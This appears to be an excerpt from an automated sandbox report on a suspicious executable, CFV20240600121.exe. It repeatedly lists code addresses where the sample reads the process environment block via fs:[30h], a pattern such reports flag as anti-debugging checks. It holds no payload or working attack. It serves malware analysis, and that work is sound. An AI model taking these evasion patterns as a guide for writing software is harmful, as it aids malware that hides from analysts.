            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0140E59C mov eax, dword ptr fs:[00000030h]12_2_0140E59C
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013D25E0 mov eax, dword ptr fs:[00000030h]12_2_013D25E0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_014505A7 mov eax, dword ptr fs:[00000030h]12_2_014505A7
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_014505A7 mov eax, dword ptr fs:[00000030h]12_2_014505A7
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_014505A7 mov eax, dword ptr fs:[00000030h]12_2_014505A7
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013D65D0 mov eax, dword ptr fs:[00000030h]12_2_013D65D0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0140E443 mov eax, dword ptr fs:[00000030h]12_2_0140E443
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0140E443 mov eax, dword ptr fs:[00000030h]12_2_0140E443
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0140E443 mov eax, dword ptr fs:[00000030h]12_2_0140E443
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0140E443 mov eax, dword ptr fs:[00000030h]12_2_0140E443
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0140E443 mov eax, dword ptr fs:[00000030h]12_2_0140E443
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0140E443 mov eax, dword ptr fs:[00000030h]12_2_0140E443
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0140E443 mov eax, dword ptr fs:[00000030h]12_2_0140E443
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0140E443 mov eax, dword ptr fs:[00000030h]12_2_0140E443
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013CC427 mov eax, dword ptr fs:[00000030h]12_2_013CC427
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013CE420 mov eax, dword ptr fs:[00000030h]12_2_013CE420
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013CE420 mov eax, dword ptr fs:[00000030h]12_2_013CE420
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013CE420 mov eax, dword ptr fs:[00000030h]12_2_013CE420
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0148A456 mov eax, dword ptr fs:[00000030h]12_2_0148A456
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0145C460 mov ecx, dword ptr fs:[00000030h]12_2_0145C460
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01408402 mov eax, dword ptr fs:[00000030h]12_2_01408402
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01408402 mov eax, dword ptr fs:[00000030h]12_2_01408402
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01408402 mov eax, dword ptr fs:[00000030h]12_2_01408402
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013FA470 mov eax, dword ptr fs:[00000030h]12_2_013FA470
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013FA470 mov eax, dword ptr fs:[00000030h]12_2_013FA470
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013FA470 mov eax, dword ptr fs:[00000030h]12_2_013FA470
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013C645D mov eax, dword ptr fs:[00000030h]12_2_013C645D
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013F245A mov eax, dword ptr fs:[00000030h]12_2_013F245A
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01456420 mov eax, dword ptr fs:[00000030h]12_2_01456420
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01456420 mov eax, dword ptr fs:[00000030h]12_2_01456420
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01456420 mov eax, dword ptr fs:[00000030h]12_2_01456420
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01456420 mov eax, dword ptr fs:[00000030h]12_2_01456420
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01456420 mov eax, dword ptr fs:[00000030h]12_2_01456420
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01456420 mov eax, dword ptr fs:[00000030h]12_2_01456420
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01456420 mov eax, dword ptr fs:[00000030h]12_2_01456420
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0140A430 mov eax, dword ptr fs:[00000030h]12_2_0140A430
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013D64AB mov eax, dword ptr fs:[00000030h]12_2_013D64AB
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0148A49A mov eax, dword ptr fs:[00000030h]12_2_0148A49A
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013D04E5 mov ecx, dword ptr fs:[00000030h]12_2_013D04E5
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_014044B0 mov ecx, dword ptr fs:[00000030h]12_2_014044B0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0145A4B0 mov eax, dword ptr fs:[00000030h]12_2_0145A4B0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0140674D mov esi, dword ptr fs:[00000030h]12_2_0140674D
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0140674D mov eax, dword ptr fs:[00000030h]12_2_0140674D
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0140674D mov eax, dword ptr fs:[00000030h]12_2_0140674D
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01454755 mov eax, dword ptr fs:[00000030h]12_2_01454755
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01412750 mov eax, dword ptr fs:[00000030h]12_2_01412750
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01412750 mov eax, dword ptr fs:[00000030h]12_2_01412750
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0145E75D mov eax, dword ptr fs:[00000030h]12_2_0145E75D
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013D0710 mov eax, dword ptr fs:[00000030h]12_2_013D0710
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0140C700 mov eax, dword ptr fs:[00000030h]12_2_0140C700
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013D8770 mov eax, dword ptr fs:[00000030h]12_2_013D8770
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E0770 mov eax, dword ptr fs:[00000030h]12_2_013E0770
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E0770 mov eax, dword ptr fs:[00000030h]12_2_013E0770
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E0770 mov eax, dword ptr fs:[00000030h]12_2_013E0770
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E0770 mov eax, dword ptr fs:[00000030h]12_2_013E0770
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E0770 mov eax, dword ptr fs:[00000030h]12_2_013E0770
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E0770 mov eax, dword ptr fs:[00000030h]12_2_013E0770
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E0770 mov eax, dword ptr fs:[00000030h]12_2_013E0770
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E0770 mov eax, dword ptr fs:[00000030h]12_2_013E0770
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E0770 mov eax, dword ptr fs:[00000030h]12_2_013E0770
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E0770 mov eax, dword ptr fs:[00000030h]12_2_013E0770
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E0770 mov eax, dword ptr fs:[00000030h]12_2_013E0770
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E0770 mov eax, dword ptr fs:[00000030h]12_2_013E0770
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01400710 mov eax, dword ptr fs:[00000030h]12_2_01400710
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0140C720 mov eax, dword ptr fs:[00000030h]12_2_0140C720
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0140C720 mov eax, dword ptr fs:[00000030h]12_2_0140C720
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013D0750 mov eax, dword ptr fs:[00000030h]12_2_013D0750
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0144C730 mov eax, dword ptr fs:[00000030h]12_2_0144C730
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0140273C mov eax, dword ptr fs:[00000030h]12_2_0140273C
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0140273C mov ecx, dword ptr fs:[00000030h]12_2_0140273C
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0140273C mov eax, dword ptr fs:[00000030h]12_2_0140273C
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_014507C3 mov eax, dword ptr fs:[00000030h]12_2_014507C3
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013D07AF mov eax, dword ptr fs:[00000030h]12_2_013D07AF
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0145E7E1 mov eax, dword ptr fs:[00000030h]12_2_0145E7E1
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013D47FB mov eax, dword ptr fs:[00000030h]12_2_013D47FB
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013D47FB mov eax, dword ptr fs:[00000030h]12_2_013D47FB
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0147678E mov eax, dword ptr fs:[00000030h]12_2_0147678E
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013F27ED mov eax, dword ptr fs:[00000030h]12_2_013F27ED
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013F27ED mov eax, dword ptr fs:[00000030h]12_2_013F27ED
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013F27ED mov eax, dword ptr fs:[00000030h]12_2_013F27ED
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_014847A0 mov eax, dword ptr fs:[00000030h]12_2_014847A0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013DC7C0 mov eax, dword ptr fs:[00000030h]12_2_013DC7C0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013D262C mov eax, dword ptr fs:[00000030h]12_2_013D262C
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013EE627 mov eax, dword ptr fs:[00000030h]12_2_013EE627
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0140A660 mov eax, dword ptr fs:[00000030h]12_2_0140A660
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0140A660 mov eax, dword ptr fs:[00000030h]12_2_0140A660
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0149866E mov eax, dword ptr fs:[00000030h]12_2_0149866E
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0149866E mov eax, dword ptr fs:[00000030h]12_2_0149866E
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01402674 mov eax, dword ptr fs:[00000030h]12_2_01402674
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E260B mov eax, dword ptr fs:[00000030h]12_2_013E260B
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E260B mov eax, dword ptr fs:[00000030h]12_2_013E260B
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E260B mov eax, dword ptr fs:[00000030h]12_2_013E260B
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E260B mov eax, dword ptr fs:[00000030h]12_2_013E260B
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E260B mov eax, dword ptr fs:[00000030h]12_2_013E260B
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E260B mov eax, dword ptr fs:[00000030h]12_2_013E260B
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E260B mov eax, dword ptr fs:[00000030h]12_2_013E260B
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0144E609 mov eax, dword ptr fs:[00000030h]12_2_0144E609
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01412619 mov eax, dword ptr fs:[00000030h]12_2_01412619
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01406620 mov eax, dword ptr fs:[00000030h]12_2_01406620
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01408620 mov eax, dword ptr fs:[00000030h]12_2_01408620
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013EC640 mov eax, dword ptr fs:[00000030h]12_2_013EC640
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0140A6C7 mov ebx, dword ptr fs:[00000030h]12_2_0140A6C7
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0140A6C7 mov eax, dword ptr fs:[00000030h]12_2_0140A6C7
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013D4690 mov eax, dword ptr fs:[00000030h]12_2_013D4690
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013D4690 mov eax, dword ptr fs:[00000030h]12_2_013D4690
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_014506F1 mov eax, dword ptr fs:[00000030h]12_2_014506F1
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_014506F1 mov eax, dword ptr fs:[00000030h]12_2_014506F1
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0144E6F2 mov eax, dword ptr fs:[00000030h]12_2_0144E6F2
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0144E6F2 mov eax, dword ptr fs:[00000030h]12_2_0144E6F2
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0144E6F2 mov eax, dword ptr fs:[00000030h]12_2_0144E6F2
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0144E6F2 mov eax, dword ptr fs:[00000030h]12_2_0144E6F2
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0140C6A6 mov eax, dword ptr fs:[00000030h]12_2_0140C6A6
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_014066B0 mov eax, dword ptr fs:[00000030h]12_2_014066B0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01450946 mov eax, dword ptr fs:[00000030h]12_2_01450946
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_014A4940 mov eax, dword ptr fs:[00000030h]12_2_014A4940
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013C8918 mov eax, dword ptr fs:[00000030h]12_2_013C8918
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013C8918 mov eax, dword ptr fs:[00000030h]12_2_013C8918
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0141096E mov eax, dword ptr fs:[00000030h]12_2_0141096E
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0141096E mov edx, dword ptr fs:[00000030h]12_2_0141096E
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0141096E mov eax, dword ptr fs:[00000030h]12_2_0141096E
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0145C97C mov eax, dword ptr fs:[00000030h]12_2_0145C97C
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01474978 mov eax, dword ptr fs:[00000030h]12_2_01474978
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01474978 mov eax, dword ptr fs:[00000030h]12_2_01474978
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0144E908 mov eax, dword ptr fs:[00000030h]12_2_0144E908
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0144E908 mov eax, dword ptr fs:[00000030h]12_2_0144E908
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0145C912 mov eax, dword ptr fs:[00000030h]12_2_0145C912
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013F6962 mov eax, dword ptr fs:[00000030h]12_2_013F6962
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013F6962 mov eax, dword ptr fs:[00000030h]12_2_013F6962
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013F6962 mov eax, dword ptr fs:[00000030h]12_2_013F6962
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0146892B mov eax, dword ptr fs:[00000030h]12_2_0146892B
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0145892A mov eax, dword ptr fs:[00000030h]12_2_0145892A
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_014669C0 mov eax, dword ptr fs:[00000030h]12_2_014669C0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013D09AD mov eax, dword ptr fs:[00000030h]12_2_013D09AD
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013D09AD mov eax, dword ptr fs:[00000030h]12_2_013D09AD
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_014049D0 mov eax, dword ptr fs:[00000030h]12_2_014049D0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0149A9D3 mov eax, dword ptr fs:[00000030h]12_2_0149A9D3
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E29A0 mov eax, dword ptr fs:[00000030h]12_2_013E29A0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E29A0 mov eax, dword ptr fs:[00000030h]12_2_013E29A0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E29A0 mov eax, dword ptr fs:[00000030h]12_2_013E29A0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E29A0 mov eax, dword ptr fs:[00000030h]12_2_013E29A0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E29A0 mov eax, dword ptr fs:[00000030h]12_2_013E29A0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E29A0 mov eax, dword ptr fs:[00000030h]12_2_013E29A0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E29A0 mov eax, dword ptr fs:[00000030h]12_2_013E29A0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E29A0 mov eax, dword ptr fs:[00000030h]12_2_013E29A0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E29A0 mov eax, dword ptr fs:[00000030h]12_2_013E29A0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E29A0 mov eax, dword ptr fs:[00000030h]12_2_013E29A0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E29A0 mov eax, dword ptr fs:[00000030h]12_2_013E29A0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E29A0 mov eax, dword ptr fs:[00000030h]12_2_013E29A0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E29A0 mov eax, dword ptr fs:[00000030h]12_2_013E29A0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0145E9E0 mov eax, dword ptr fs:[00000030h]12_2_0145E9E0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_014029F9 mov eax, dword ptr fs:[00000030h]12_2_014029F9
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_014029F9 mov eax, dword ptr fs:[00000030h]12_2_014029F9
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013DA9D0 mov eax, dword ptr fs:[00000030h]12_2_013DA9D0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013DA9D0 mov eax, dword ptr fs:[00000030h]12_2_013DA9D0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013DA9D0 mov eax, dword ptr fs:[00000030h]12_2_013DA9D0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013DA9D0 mov eax, dword ptr fs:[00000030h]12_2_013DA9D0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013DA9D0 mov eax, dword ptr fs:[00000030h]12_2_013DA9D0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013DA9D0 mov eax, dword ptr fs:[00000030h]12_2_013DA9D0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_014589B3 mov esi, dword ptr fs:[00000030h]12_2_014589B3
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_014589B3 mov eax, dword ptr fs:[00000030h]12_2_014589B3
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_014589B3 mov eax, dword ptr fs:[00000030h]12_2_014589B3
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013F2835 mov eax, dword ptr fs:[00000030h]12_2_013F2835
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013F2835 mov eax, dword ptr fs:[00000030h]12_2_013F2835
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013F2835 mov eax, dword ptr fs:[00000030h]12_2_013F2835
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013F2835 mov ecx, dword ptr fs:[00000030h]12_2_013F2835
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013F2835 mov eax, dword ptr fs:[00000030h]12_2_013F2835
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013F2835 mov eax, dword ptr fs:[00000030h]12_2_013F2835
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01400854 mov eax, dword ptr fs:[00000030h]12_2_01400854
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01466870 mov eax, dword ptr fs:[00000030h]12_2_01466870
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01466870 mov eax, dword ptr fs:[00000030h]12_2_01466870
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0145E872 mov eax, dword ptr fs:[00000030h]12_2_0145E872
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0145E872 mov eax, dword ptr fs:[00000030h]12_2_0145E872
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0145C810 mov eax, dword ptr fs:[00000030h]12_2_0145C810
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013D4859 mov eax, dword ptr fs:[00000030h]12_2_013D4859
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013D4859 mov eax, dword ptr fs:[00000030h]12_2_013D4859
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0140A830 mov eax, dword ptr fs:[00000030h]12_2_0140A830
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0147483A mov eax, dword ptr fs:[00000030h]12_2_0147483A
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0147483A mov eax, dword ptr fs:[00000030h]12_2_0147483A
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E2840 mov ecx, dword ptr fs:[00000030h]12_2_013E2840
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_014A08C0 mov eax, dword ptr fs:[00000030h]12_2_014A08C0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0149A8E4 mov eax, dword ptr fs:[00000030h]12_2_0149A8E4
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0140C8F9 mov eax, dword ptr fs:[00000030h]12_2_0140C8F9
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0140C8F9 mov eax, dword ptr fs:[00000030h]12_2_0140C8F9
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013D0887 mov eax, dword ptr fs:[00000030h]12_2_013D0887
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0145C89D mov eax, dword ptr fs:[00000030h]12_2_0145C89D
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013FE8C0 mov eax, dword ptr fs:[00000030h]12_2_013FE8C0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01484B4B mov eax, dword ptr fs:[00000030h]12_2_01484B4B
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01484B4B mov eax, dword ptr fs:[00000030h]12_2_01484B4B
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01478B42 mov eax, dword ptr fs:[00000030h]12_2_01478B42
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01466B40 mov eax, dword ptr fs:[00000030h]12_2_01466B40
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01466B40 mov eax, dword ptr fs:[00000030h]12_2_01466B40
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0149AB40 mov eax, dword ptr fs:[00000030h]12_2_0149AB40
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0147EB50 mov eax, dword ptr fs:[00000030h]12_2_0147EB50
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_014A2B57 mov eax, dword ptr fs:[00000030h]12_2_014A2B57
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_014A2B57 mov eax, dword ptr fs:[00000030h]12_2_014A2B57
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_014A2B57 mov eax, dword ptr fs:[00000030h]12_2_014A2B57
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_014A2B57 mov eax, dword ptr fs:[00000030h]12_2_014A2B57
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013FEB20 mov eax, dword ptr fs:[00000030h]12_2_013FEB20
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013FEB20 mov eax, dword ptr fs:[00000030h]12_2_013FEB20
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013CCB7E mov eax, dword ptr fs:[00000030h]12_2_013CCB7E
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_014A4B00 mov eax, dword ptr fs:[00000030h]12_2_014A4B00
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0144EB1D mov eax, dword ptr fs:[00000030h]12_2_0144EB1D
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0144EB1D mov eax, dword ptr fs:[00000030h]12_2_0144EB1D
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0144EB1D mov eax, dword ptr fs:[00000030h]12_2_0144EB1D
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0144EB1D mov eax, dword ptr fs:[00000030h]12_2_0144EB1D
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0144EB1D mov eax, dword ptr fs:[00000030h]12_2_0144EB1D
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0144EB1D mov eax, dword ptr fs:[00000030h]12_2_0144EB1D
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0144EB1D mov eax, dword ptr fs:[00000030h]12_2_0144EB1D
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0144EB1D mov eax, dword ptr fs:[00000030h]12_2_0144EB1D
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0144EB1D mov eax, dword ptr fs:[00000030h]12_2_0144EB1D
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01498B28 mov eax, dword ptr fs:[00000030h]12_2_01498B28
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01498B28 mov eax, dword ptr fs:[00000030h]12_2_01498B28
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013C8B50 mov eax, dword ptr fs:[00000030h]12_2_013C8B50
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E0BBE mov eax, dword ptr fs:[00000030h]12_2_013E0BBE
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E0BBE mov eax, dword ptr fs:[00000030h]12_2_013E0BBE
